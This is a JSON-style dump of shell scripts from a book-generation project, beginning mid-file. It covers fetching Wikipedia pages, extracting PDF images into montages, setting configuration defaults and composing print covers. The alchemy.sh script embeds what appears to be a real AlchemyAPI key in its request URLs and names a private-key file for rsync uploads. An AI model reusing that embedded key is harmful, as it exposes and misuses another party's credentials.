$url | sed -e 's/.*wiki\\///')\n\techo \"wikiurl is\" $wikiurl\n\techo \"title is \" $title\n\techo \"description is\" $description\n\n\tfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/api.php?action=parse&format=json&page=\"\n\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\tendfetchurl=\"&mobileformat=html&noimages=\"\n\tfetchurl=$fetchurlbase$wikiurl$endfetchurl\n\techo \"url to be fetched is\" $fetchurl | tee --append $sfb_log\n\n\tcurl --silent --connect-timeout 15 --max-time 45 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$count.json $fetchurl \n\n\t# xmlstarlet sel -t -v \"/api/parse/@*\" tmp/$uuid/$count.xml > tmp/$uuid/$count.html\n\n\tcat tmp/$uuid/$count.json | lib/jshon/jshon -e parse -e text -u | sed 's|<a[^>]* href=\"[^\"]*/|<a href=\"http://en.wikipedia.org/wiki/|g' > tmp/$uuid/$count.html\n\n\tebook-convert tmp/$uuid/$count.html tmp/$uuid/$count.txt --pretty-print 1> /dev/null\n\n\techo \"fetched document from\" $fetchurl \"and saved as tmp/\"$uuid/$count\".html and converted to txt using calibre\" | tee --append sfb_log\n\n\t# reports on status of fetches\n\n\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount | tee --append $sfb_log\n\n\tcount=$((count+1))\n\n\tdone <fetch/$uuid/safesearchresults.txt\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.7602339386940002, "avg_line_length": 23.285715103149414, "blob_id": "93e342a8278fda447ecb4df3d6844cc54f62b1c0", "content_id": "78e5027143839c26d13fd6b0bd6408796f97b921", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 171, "license_type": "permissive", "max_line_length": 70, "num_lines": 7, "path": "/scripts/bin/lookup_acronyms.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nwhile read acronym\ndo\n\techo $acronym \n\twtf -f /usr/share/games/bsdgames/acronyms.climate $acronym >> results\ndone<~/Dropbox/methane/paper4/filtered_acronyms\n\n" }, { "alpha_fraction": 0.6702077984809875, "alphanum_fraction": 0.6858303546905518, "avg_line_length": 22.884328842163086, "blob_id": "321f7f068af12ab4be50b6615b763f1b99b00b93", "content_id": "be0505cc071a9405276ebe7c64182e6ed9233e1e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6401, "license_type": "permissive", "max_line_length": 181, "num_lines": 268, "path": "/scripts/bin/montageur.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# extracts, analyzes, and summarizes images from permissioned PDF documents\n\n# requires pdfimages, imagemagick, fdupes, pdftk\n\n# input: PDF file\n# output: unique jpgs, zip, montage\n\necho \"-M-M-M-M-M-M-M-M-M-M-M-M-M-M\" | tee --append $xform_log\necho \"starting montageur\"| tee --append $xform_log\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n. $scriptpath\"includes/set-variables.sh\"\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nstarttime=$(( `date +%s` ))\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: montageur.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--maximages)\nmaximages=$2\nshift 2\n;;\n--maximages=*)\nmaximages=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--montageurdir)\nmontageurdir=$2\nshift 2\n;;\n--montageurdir=*)\nmontageurdir=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--tmpdir)\ntmpdir=$2\nshift 2\n;;\n--tmpdir=*)\ntmpdir=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfinfile\" ]; then\n echo \"ERROR: option '--pdfinfile[pdfinfile]' not given. See --help\" >&2\n exit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 $TMPDIR$uuid\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\nfi\n\nstopimagefolder=\"none\" #default\nmaximages=\"3\" #default\nthumbxsize=120 #default\nthumbysize=120 #default\noutfile=\"montage.jpg\"\nmontageurdir=\"montageur\"\n\npdfimages -j \"$pdfinfile\" $TMPDIR$uuid/\"$montageurdir\"/extracted_images\nls -la $TMPDIR$uuid\nif [ ls *.pbm &> /dev/null ] ; then\n\techo \"pbm files exist so converting to ppm\" | tee --append $xform_log\n\tfor f in $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.pbm; do\n\t convert ./\"$f\" ./\"${f%.pbm}.ppm\"\n\tdone\nelse\n\techo \"no pbm files\" | tee --append $xform_log\nfi\n\nif test -n \"$(shopt -s nullglob; echo $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm)\"\nthen\n echo \"image files were found in the target pdf\" | tee --append $xform_log\nelse\n echo \"montageur exiting, no image files were found in the target pdf\" | tee --append $xform_log\n exit 1\nfi\n\n\n # convert ppms to jpegs\n\necho \"about to mogrify ppms into jpgs\"\n\nmogrify -format jpg $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm\necho \"removing ppm files\"\n rm $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm\n if [ ls *.pbm &> /dev/null ] ; then\n\techo \"removing pbm files\"\n\t# rm $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.pbm\nelse\n\techo \"no pbm files\" | tee --append $xform_log\nfi\n\n\n# remove small images\n\nfor i in $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg\ndo\n\tbytes=`identify -format \"%b\" $i | cut -dB -f1`\n\techo $bytes\n\tif [ \"$bytes\" -lt 1000 ] ; then\n\t\trm $i\n\t\techo \"removed small image\" $i\n\telse\n\t\ttrue\n\tfi\ndone\n\nls -la $TMPDIR$uuid\n\n# count images and create metadata\n\n# if maximages is provided then create a separate montage at the end using just those images\n\nimagecount=$(ls $TMPDIR$uuid/\"$montageurdir\"/*.jpg | wc -l)\necho \"imagecount is\" $imagecount\nls -S $TMPDIR$uuid/\"$montageurdir\"/*.jpg > $TMPDIR$uuid/\"$montageurdir\"/listbysize.txt\n\nls -la $TMPDIR$uuid\n# delete dupes\nfdupes $TMPDIR$uuid/.\n\n# kluge move stop images into working directory\n\nif [ \"$stopimagefolder\" != \"none\" ] ; then\n\n\techo \"stopimagefolder was\" $stopimagefolder | tee --append $xform_log\n\tcp $stopimagefolder/* .\n\tfdupes -r . > $TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\tsed -i '/^$/d' $TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\twhile read -r filename; do\n\techo \"$filename is filename\"\n\t rm \"$filename\"\n\tdone <$TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\nelse\n\n\techo \"no stopimage folder\" | tee --append $xform_log\n\nfi\n\nzip $TMPDIR$uuid/\"$montageurdir\"/extracted_images.zip $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg\n\necho \"$pdfinfile is pdfinfile\"\nls -la $TMPDIR$uuid\n\npdftk \"$pdfinfile\" dump_data output | grep -E \"Figure*|Table*|Map*|Illustration*\" | sed 's/BookmarkTitle//' > $TMPDIR$uuid/\"$montageurdir\"/figures_metadata.txt\n\n# build montage image\n\nmontage -density 300 -units pixelsperinch $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg -geometry '800x800>+4+3' $TMPDIR$uuid/\"$montageurdir\"/$outfile\ncp $TMPDIR$uuid/\"$montageurdir\"/$outfile $TMPDIR$uuid/$outfile\n\nmontage -density 300 -units pixelsperinch $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg -tile 3x4 -geometry '800x800>+3+4' $TMPDIR$uuid/\"$montageurdir\"/portrait_%d.jpg\ncp -R $TMPDIR$uuid/\"$montageurdir\"/portrait* $TMPDIR$uuid\n\n# build optional top N images montage\n\nif [ \"$maximages\" != \"no\" ] ; then\n\n\techo \"building additional image from top N\"\n\tmkdir -p -m 755 $TMPDIR$uuid/montageurtopn\n\n\t# put N files in tmp directory\n\tcd $TMPDIR$uuid/\"$montageurdir\"\n\tcp `find ./extr*.jpg -maxdepth 1 -printf '%s %p\\n'|sort -nr|head -n \"$maximages\" | cut -d/ -f2` ../montageurtopn\n\tcd $scriptpath\n\t# build the montage\n\n\tmontage -density 300 -units pixelsperinch $TMPDIR$uuid/montageurtopn/extracted_images*.jpg -geometry '2150x900>+4+3' -tile 1x\"$maximages\" $TMPDIR$uuid/montageurtopn/montagetopn.jpg\n\nelse\n\techo \"not building top N images montage\" | tee --append $xform_log\n\nfi\n\necho \"montageur complete\" | tee --append $xform_log\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 21, "blob_id": "aaa310d1353950f8fee2e66006201d9066239c5e", "content_id": "71d73b62fbe1a109c77babb2a495689c0b2e5a4d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 44, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/scripts/bin/somescript.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"test\" > ~/somescript.test\n" }, { "alpha_fraction": 0.7535771131515503, "alphanum_fraction": 0.7625861167907715, "avg_line_length": 36, "blob_id": "927410f0608f6bd88fd1288783a4fd4830e29793", "content_id": "75f1df48c137fdbe1730756c0b725da46d8f896d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1887, "license_type": "permissive", "max_line_length": 106, "num_lines": 51, "path": "/conf/config_defaults.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block should be customized\nMACHINE_NAME=\"$hostname\" # can be anything\nenvironment=\"PageKicker-installation\" # can be anything\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/home/$USER/pagekicker-community/\"\nLOCAL_DATA=\"$SFB_HOME\"local-data/\nSFB_MAGENTO_HOME=\"/home/$USER/magento/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python3\"\nPYTHON27_BIN=\"/usr/bin/python\"\nNER_BIN=\"$scriptpath/lib/stanford-ner-2020-11-17\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git describe`\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\n#MY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"$USER\"\nHOSTDIR=\"/home/$USER\"\nAPACHE_ROOT=\"/var/www/html/\"\nWEB_HOST=\"http://127.0.0.1/\"\nWEB_ROOT=\"/var/www/html/pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\"\nLOCAL_MYSQL_PATH=\"\"\nLOCAL_MYSQL_USER=\"user\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\n\nimport_available_on_machine=\"no\" # is there a working catalog connection\n\n# following paths dependent on variables specified above\n# and should not need to be changed\n\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nWEBFORMSHOME=$SFB_MAGENTO_HOME\"media/webforms/\"\n\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nconfdir=\"$SFB_HOME\"conf/\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\n" }, { "alpha_fraction": 0.8105263113975525, "alphanum_fraction": 0.8252631425857544, "avg_line_length": 51.77777862548828, "blob_id": "25dcd6256746c88f34ecf94e4179e8daa23a2c3e", "content_id": "ad9250a01168d6a22bcac1fd7a1a605e8bce6e79", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 475, "license_type": "permissive", "max_line_length": 109, "num_lines": 9, "path": "/test/test-mkdir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "mkdir -p local-data/bibliography local-data/bibliography/imprints local-data/bibliography/imprints/pagekicker\nmkdir -p local-data/bibliography/robots local-data/bibliography/robots/default\nmkdir -p local-data/bibliography/yaml\nmkdir -p local-data/jobprofile_builds/default\nmkdir -p local-data/logs/uuids\nmkdir -p local-data/seeds/history\nmkdir -p local-data/seeds/SKUs\necho \"1000001\" > local-data/SKUs/sku_list\ntouch local-data/bibliography/robots/default/default_titles.txt\n" }, { "alpha_fraction": 0.72119140625, "alphanum_fraction": 0.7294921875, "avg_line_length": 63, "blob_id": "4db937cbe666eb198fb64ddf69659073f10e28ec", "content_id": "858cbb3ffebc74e7d9e802f2b23087f86addf9a3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2048, "license_type": "permissive", "max_line_length": 233, "num_lines": 32, "path": "/scripts/includes/alchemy.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"running alchemy module\" | tee --append $sfb_log\n\necho \"placing documents for analysis on public web server for access by Alchemy\" | tee --append $sfb_log\n\n\nrsync -av -e \"ssh -i/home/fred/Documents/certificates/restorepk.pem\" $scriptpath\"tmp/\"$uuid/cumulative.html \"[email protected]:/opt/bitnami/apache2/htdocs/alchemy-staging/\"$sku\"cumulative.html\"\nrsync -av -e \"ssh -i/home/fred/Documents/certificates/restorepk.pem\" $scriptpath\"tmp/\"$uuid/cumulative.txt \"[email protected]:/opt/bitnami/apache2/htdocs/alchemy-staging/\"$sku\"cumulative.txt\"\n\ncurl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$sku\"tags.xml\" http://access.alchemyapi.com/calls/url/URLGetRankedConcepts?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=\"$WEB_HOST\"alchemy-staging/$sku\"cumulative.html\" \n\ncurl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$sku\"namedentities.xml\" http://access.alchemyapi.com/calls/url/URLGetRankedNamedEntities?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=\"$WEB_HOST\"alchemy-staging/$sku\"cumulative.html\"\n\t\nxml2 < \"tmp/$uuid/$sku\"namedentities.xml\" > \"tmp/$uuid/$sku\"namedentities.csv\"\n\ncat tmp/$uuid/$sku\"namedentities.csv\" | grep 'text' | cut -d= -f 2 > tmp/$uuid/$sku\"nameentities.txt\"\n\t\n curl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/\"keywords.xml\" http://access.alchemyapi.com/calls/url/URLGetRankedKeywords?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=\"$WEB_HOST\"alchemy-staging/$sku\"cumulative.txt\"\n\t\t\t\nif grep -q '<status>ERROR</status>' tmp/$uuid/$sku\"keywords.xml\" ; then\n\techo \"Alchemy API error, product tags could not be retrieved 4 seed\" $seed | tee --append $sfb_log\n\t# save seeds so they tags can be added later when API is working\n\techo $seed | tee --append logs/tags-not-retrieved.txt\n\techo \"tags were not available 4 this document\" > tmp/$uuid/$sku\"keywords.txt\"\nelse\n\t\t\n\txml2 < \"tmp/\"$uuid\"/\"$sku\"keywords.xml\" > \"tmp/\"$uuid\"/\"$sku\"keywords.csv\"\n\n\tcat \"tmp/\"$uuid/$sku\"keywords.csv\" | grep 'text' | cut -d= -f 2 > \"tmp/\"$uuid\"/\"$sku\"keywords.txt\"\n\nfi\n\necho \"fetched keywords from Alchemy and saved as$uuidkeywords.txt\" | tee --append $sfb_log\n" }, { "alpha_fraction": 0.7376319169998169, "alphanum_fraction": 0.7583502531051636, "avg_line_length": 41.159183502197266, "blob_id": "b1d80b6df2bcca7d215a2433146325eb787442e0", "content_id": "52d3bb1d03a1e00677ad22109088e0999c1cdb78", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 10329, "license_type": "permissive", "max_line_length": 353, "num_lines": 245, "path": "/scripts/includes/print-cover-v2.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#initialize print variables\n\n# this is for case bound only - most of these values would need to be conditional to support other bindings\n\n\tprint_horizontal_trim=2438 # 8.125 inches for 8.5 inch books\n\tprint_vertical_trim=3300\n\tprint_top_height=$((print_vertical_trim / 4))\n\tprint_bottom_height=$((print_vertical_trim / 10))\n\tprint_label_text_width=$((print_horizontal_trim - 225))\n\toutsidebleed=187\n\tinsidebleed=204\n\ttopbleed=217\n\tbottombleed=225\n\ttextsafety=150\n\tuserprovidedprintISBN=9781608880416 # dev only\n\tspinepixels=131 #dev only\n\n# create directory for print images\n\n\tcd images/$uuid ; mkdir print ; echo \"created directory images/$uuid/print\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# calculate dimensions\n\n\t# calculate spine dimensions (we must know the spine before we can do the canvas!)\n\n\t\techo \"checking sku is \" $sku \"and path to pdf is \" $mediatargetpath$uuid\"/\"$sku\"print.pdf\" \n\n\t\tpdfpagecount=`pdftk $mediatargetpath$uuid/$sku\"print.pdf\" dump_data output | grep -i NumberOfPages | cut -d\":\" -f2 | sed '/^$/d'`\n\n\t\techo \"pdf page count is\" $pdfpagecount\n\n\t\t# get rid of space and save $spinepixels as variable\n\n\t# calculate size of canvas\n\n\t\tcanvaswidth=$(( $print_horizontal_trim * 2 + $spinepixels + $outsidebleed + $insidebleed + $insidebleed + $outsidebleed + 10 ))\n\t\tcanvasheight=$(( $topbleed + $print_vertical_trim + $bottombleed + 10 ))\n\n\t\techo \"calculated canvaswidth as \"$canvaswidth\n\t\techo \"calculated canvasheight as \"$canvasheight\n\n\t# calculate safe areas on front and back page\n\n\t\tsafepagewidth=$(( $print_horizontal_trim - $textsafety - $textsafety ))\n\t\tsafepageheight=$(( $print_vertical_trim - $textsafety ))\n\n\t\techo \"calculated safepagewidth as\" $safepagewidth\n\t\techo \"calculated safepageheight as\" $safepageheight\n\n\t# calculate spine\n\n\t\tif [ \"$spinepixels\" -lt 106 ] ; then\n\t\t\tspinesafety=10\n\t\telse\n\t\t\tspinesafety=18\n\t\tfi\n\n\t\techo \"because spine width is less than 105 pixels, spinesafety is \" $spinesafety\n\n\t\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\t\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\t\tsafespinetitleheight=$(( $safepageheight / 2 ))\n\n\t\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\t\tspineleftmargin=$(( $outsidebleed + $insidebleed + $print_horizontal_trim + $spinesafety * 2 ))\n\n\t\techo \"calculated spineleftmargin as bleed + page width +spinepixels for \" $spineleftmargin\n\t\t\n\t\tspinelogotypebegin=$(( $print_horizontal_trim - 600 ))\n\n\t# front page calculations\n\n\t\tfrontpageflushleftmargin=$(( $outsidebleed + $print_horizontal_trim + $insidebleed + $spinepixels + insidebleed ))\n\n\t\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\n\n\t\t# there's always a cushion around top and bottom text t\n\n\t\tfrontpagetopcushion=150\n\n\t\tfrontpagebottomcushion=0\n\n\t\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\t\techo \"frontpagebottomcushion is \" $frontpagebottomcushion\n\n\t# back page calculations\n\n\t\tISBNylocation=$(( $safepageheight - 300 - 25 ))\n\t\tISBNxlocation=$(( $outsidebleed + 125 ))\n\n\t\techo \"calculated ISBNxlocation as\" $ISBNxlocation\n\t\techo \"calculated ISBNylocation as\" $ISBNylocation\n\n\n\t# start by building the full canvas\n\n\t\tconvert -size \"$canvaswidth\"x\"$canvasheight\" xc:$newcovercolor \\\n\t\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\t\timages/$uuid/print/fullcanvas.png\n\n\n\t# then create the front cover\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_vertical_trim\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/canvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/topcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/bottomcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/toplabel.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/bottomlabel.png\n\n\n\t# underlay the Word Cloud cover (which was created during the ebookcover build)\n\n\tcomposite -gravity Center images/$uuid/ebookcover/$sku\"printcloud.png\" images/$uuid/print/canvas.png images/$uuid/print/canvas.png\n\n\t# build the labels for the front cover\n\n\t\techo \"covertitle is\" $covertitle\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_top_height\" \\\n\t\t\t-font $newcoverfont caption:\"$covertitle\" \\\n\t\t\t-density 300 -units pixelsperinch\\\n\t\t\t\t images/$uuid/print/topcanvas.png +swap -gravity center -composite images/$uuid/print/toplabel.png\\\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_bottom_height\" \\\n\t\t -font $newcoverfont caption:\"$editedby\" \\\n\t\t-density 300 -units pixelsperinch\\\n\t\t images/$uuid/print/bottomcanvas.png +swap -gravity center -composite images/$uuid/print/bottomlabel.png\n\n\t# lay the labels on top of the front cover\n\t\tcomposite -geometry +0+0 images/$uuid/print/toplabel.png images/$uuid/print/canvas.png images/$uuid/print/step1.png\n\t\tcomposite -geometry +0+$print_horizontal_trim images/$uuid/print/bottomlabel.png images/$uuid/print/step1.png images/$uuid/print/step2.png\n\t\tcomposite -gravity south -geometry +0+0 assets/PageKicker_cmyk300dpi_300.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\n\t# make a working copy of the front cover\n\n\t\tcp images/$uuid/print/cover.png images/$uuid/print/$sku\"printfrontcover.png\"\n\n\t# make PDF and EPS copies of the front cover\n\t\tconvert images/$uuid/print/$sku\"printfrontcover.png\" -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\"\n\t\tconvert -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\" images/$uuid/print/$sku\"printfrontcover.eps\"\n\n\t# replace first page of interior with print cover page\n\n\t\tpdftk A=$mediatargetpath$uuid/$sku\"print.pdf\" B=\"images/\"$uuid/print/$sku\"printfrontcover.pdf\" cat B1 A2-end output $mediatargetpath$uuid/$sku\"finalprint.pdf\"\n\n\t# build the ISBN\n\n\tpython $scriptpath\"lib/bookland-1.4/bookland-1.4.1b\" -o images/$uuid/print/$userprovidedprintISBN.eps -f OCRB -b 1 -q --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\t\n\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 25x25 -bordercolor white images/$uuid/print/$userprovidedprintISBN.eps -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.png\n\n\t# build the spine caption\n\n\techo \"building spine caption\"\n\n\tconvert -size $safespinetitleheight$x$safespinetitlewidth -density 300 -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"$covertitle\" images/$uuid/print/spinecaption.png\n\n\t# build the spine logotype\n\n\techo \"building spine logotype\"\n\n\tconvert -size $safespinetitleheight$x$safespinetitlewidth -density 300 -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity East caption:\"PageKicker\" images/$uuid/print/spinelogotype.png\n\n\n# lay the objects on the canvas\n\n\n\t\n\t# lay the ISBN box at the bottom left corner of the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas.png \\\n\t\timages/$uuid/print/$userprovidedprintISBN.png -geometry +$ISBNxlocation+$ISBNylocation -composite \\\n\t\timages/$uuid/print/fullcanvas1.png \n\n\t# lay the front cover on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas1.png \\\n\t\timages/$uuid/print/$sku\"printfrontcover.png\" -geometry +$frontpageflushleftmargin+$topbleed -composite \\\n\t\timages/$uuid/print/fullcanvas2.png\n\n# assemble and lay down the spine caption and logotype, unless it is too thin\n\n\tif [ \"$pdfpagecount\" -lt 48 ]; then\n\n\t\techo \"page count too low for spine\"\n\t\tcp images/$uuid/print/fullcanvas2.png images/$uuid/print/finalcanvas.png\n\n\telse\n\n\t\t# lay the spine caption on the full canvas\n\n\t\t\tconvert images/$uuid/print/fullcanvas2.png \\\n\t\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+375 -composite \\\n\t\t\timages/$uuid/print/fullcanvas3.png\n\n\n\t\t# resize the purple bird \n\t\t\tpurplebirdsize=$(( $safespinetitlewidth - 20 ))\n\t\t\tconvert assets/purplebird300.png -resize $purplebirdsizex$purplebirdsize\\> images/$uuid/print/purple$safespinetitlewidth.png\n\n\t\t# surround the bird with a white box\n\n\t\t\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 5x5 -bordercolor white images/$uuid/print/purple$safespinetitlewidth.png -colorspace CMYK images/$uuid/print/purplebirdwithbox.png\n\n\t\t# create spacer box\n\n\t\tconvert -size \"$safespinetitlewidth\"x20 xc:none images/$uuid/print/spacer.png\n\n\t\t# append spine logotype, spacer, and purplebird box\n\n\t\tconvert images/$uuid/print/spinelogotype.png images/$uuid/print/spacer.png -background none -gravity west -append images/$uuid/print/logowithspacer.png\n\t\tconvert images/$uuid/print/logowithspacer.png images/$uuid/print/purplebirdwithbox.png -background none -gravity west -append images/$uuid/print/logobar.png\n\n\t\t# lay the spine logotype on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas3.png \\\n\t\timages/$uuid/print/logobar.png -geometry +$spineleftmargin+$spinelogotypebegin -composite \\\n\t\timages/$uuid/print/fullcanvas4.png\n\n\t\tcp images/$uuid/print/fullcanvas2.png images/$uuid/print/finalcanvas.png\n\n\n\tfi\n\n\t\n# save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\tconvert images/$uuid/print/finalcanvas.png -colorspace CMYK images/$uuid/print/$userprovidedISBN.pdf\n\n\techo \"built print cover as file images/$uuid/print/$sku.cmyk.pdf\" | tee --append $sfb_log\n\nxvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".pdf\" --cover \"images/\"$uuid\"/print/\"$sku\"printfrontcover.png\" --margin-left \"54\" --margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"11\" --pdf-page-numbers --insert-metadata --pdf-serif-family \"AvantGarde\" --title \"$covertitle\"\n\necho \"saving interior as PDFx1a\"\n\n# -B flag makes it b&w\n\n./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o $mediatargetpath$uuid/$userprovidedprintISBN.pdf $mediatargetpath$uuid/$sku.pdf\n" }, { "alpha_fraction": 